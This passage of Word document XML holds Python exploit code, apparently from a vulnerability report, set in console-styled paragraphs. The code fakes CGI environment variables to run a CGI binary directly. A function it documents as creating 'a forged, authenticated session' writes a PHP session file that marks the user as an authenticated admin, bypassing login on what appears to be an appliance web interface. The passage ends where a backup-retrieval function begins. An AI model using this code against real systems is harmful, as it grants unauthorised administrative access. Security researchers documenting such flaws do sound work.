          <w:p w14:paraId="26464BDE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["GATEWAY_INTERFACE"] = "CGI/1.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D95D69" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REQUEST_METHOD"] = "GET"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AE17636" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7680D333" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "HTTP_USER_AGENT"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="473346B6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ] = "Mozilla/5.0 (X11; Linux x86_64) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152C7F46" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["QUERY_STRING"] = ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671B5B06" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">["REMOTE_ADDR"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1F7FD0AB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["HTTP_COOKIE"] = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="057501A6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["SCRIPT_NAME"] = "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/" + path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74CCE264" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REDIRECT_STATUS"] = "1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73161328" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REQUEST_URI"] = "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/" + path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E9D70D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15EBC865" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117386C9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        [CGI_BIN, path], </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, stderr=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>subprocess.STDOUT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="18069A6C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="505EED10" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B951C2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34825C3D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0819650F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_session_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, user):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51469C35" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """Creates a forged, authenticated session"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE37A18" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DCFA037" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    template = """logPageName|s:12:"legal notice";loginMethod|i:1;userName|s:5:"admin";expireTime|i:%d;authenticated|s:3:"yes";pam_session0|s:0:"";userId|i:%d;userGroup|s:%d:"%s";groupId|i:%d;ProfileId|s:2:"18";MENU_ID_loginUtils|s:3:"1.0";MENU_ID_topNavMenu|s:3:"3.0";MENU_ID_ESD_LeftNavigationMenu|s:3:"2.0";MENU_ID_UtilLeftNavigationMenu|s:3:"3.0";client_ip|s:%d:"%s";creationTime|i:%d;"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01425259" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="685DD72D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    # Get user UID, GID, and Group Name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7314D80D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    u = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pwd.getpwnam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(user)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01B155F3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>group_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>grp.getgrgid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u.pw_gid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gr_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0B3AFC0F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70E48871" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    # Generate session token that doesn't collide with existing ones and looks same as real session token (not technically necessary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A534258" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    alphanumeric = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string.ascii</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_lowercase</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string.digits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3724D281" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1AAC82F8" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67293158" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        session = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_random_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>alphanumeric, 26)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3256E139" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A0B22E5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        if not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.path</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.exists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os.path.join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(SESSION_PATH, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>_" + session)):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28468735" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34BDB1D4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C5BE6FB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = int(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>time.time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB92AA4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expireTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + 100000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A58802" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="175F7192" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>session_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = template % (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4394B466" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expireTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD97609" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u.pw_uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43920DF6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>group_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552E7646" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>group_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727C4873" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u.pw_gid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F448A2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A933535" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6D219A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AEC146" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38397A57" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10172244" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>os.path.join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(SESSION_PATH, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>_" + session), "w") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628A4931" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>session_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E26C95F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="610822EB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    return session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1030704F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D513F7F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20FDB8D7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>do_get_backup_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>):</w:t>
            </w:r>
          </w:p>
